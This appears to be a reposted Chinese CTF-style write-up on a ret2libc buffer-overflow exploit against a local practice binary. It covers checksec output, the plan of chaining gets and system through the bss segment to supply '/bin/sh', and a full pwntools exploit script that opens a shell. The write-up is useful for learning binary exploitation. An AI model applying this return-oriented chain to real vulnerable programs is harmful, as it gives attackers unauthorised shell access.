Ret2Libc(2) (有system、無‘/bin/sh’)繞過NX、ASLR
阿新 • • 發佈:2018-12-17
和Ret2Libc(1)一樣,先把程式扔進IDA看看程式碼
和Ret2Libc(1)一樣,gets存在溢位漏洞
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
可以看到程式開啟了NX,
我的linux已經開啟了ASLR
存在system函式,地址為 0x08048490
不存在‘/bin/sh'欄位
漏洞利用思路:
程式中既然找不到‘/bin/sh‘,那我們就需要想辦法輸入進去,恰好用objdump發現存在gets函式 ,地址為0x08048460
而且還存在也就說明,我們可以手動把shellcode輸入進去,然後存放進bss段裡面,最後把這個bss地址傳給system來呼叫shellcode
1、用gets的地址覆蓋函式返回地址
2、構造gets的返回地址,(因為gets輸入shellcode後,我們就要呼叫system函式來getshell,所以gets的返回地址是system函式的呼叫地址,即system_plt)
3、構造gets需要的引數(就是存放輸入字串的地址,bss段0x804A080)
4、構造system的引數(就是存放輸入字串的地址,bss段0x804A080)
exp:
from pwn import * bss_addr = 0x0804A080 gets_plt = 0x08048460 sys_plt = 0x08048490 io=process('./ret2libc2') io.recvuntil('What do you think ?') payload = 'A'*112 + p32(gets_plt) + p32(sys_plt) + p32(bss_addr) + p32(bss_addr) io.sendline(payload) io.sendline('/bin/sh') io.interactive()